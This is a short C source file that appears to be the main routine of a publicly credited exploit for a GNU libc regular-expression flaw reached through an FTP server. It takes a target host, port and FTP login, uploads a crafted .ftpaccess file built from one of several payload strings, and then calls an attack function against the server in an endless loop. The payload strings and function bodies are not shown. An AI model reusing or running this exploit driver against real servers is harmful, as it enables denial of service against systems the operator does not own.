
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int atoi (char*) ;
 int attack (char*,char*,char*,char*) ;
 int createexpl (char*,char*,char*,char*,char*,char*) ;
 char* expl0 ;
 char* expl1 ;
 char* expl2 ;
 char* expl3 ;
 int printf (char*,...) ;
 int usage () ;

int main(int argc,char *argv[])
{

        char *login,*pass,*lip=((void*)0);
        char logindef[]="anonymous",passdef[]="cx@127.0.0.1";

        printf("This is exploit for ERE (GNU libc)\nby Maksymilian Arciemowicz\n\n");

        if(argc<3) usage();

        char *host=argv[1];
        char *port=argv[2];

        if(4<=argc) login=argv[3];
        else login=logindef;

        if(5<=argc) pass=argv[4];
        else pass=passdef;

 if(6<=argc) lip=argv[5];

 if(7<=argc) switch(atoi(argv[6])){
  case 1:
   printf("Try create .ftpaccess with %s\n\n",expl0);
   createexpl(host,port,login,pass,lip,expl0);
  break;

  case 2:
   printf("Try create .ftpaccess with %s\n\n",expl1);
   createexpl(host,port,login,pass,lip,expl1);
  break;

  case 3:
   printf("Try create .ftpaccess with %s\n\n",expl2);
   createexpl(host,port,login,pass,lip,expl2);
  break;

  case 4:
   printf("Try create .ftpaccess with %s\n\n",expl3);
   createexpl(host,port,login,pass,lip,expl3);
  break;

  default:
   usage();
  break;
 };

 while(1) attack(host,port,login,pass);

        return 0;
}
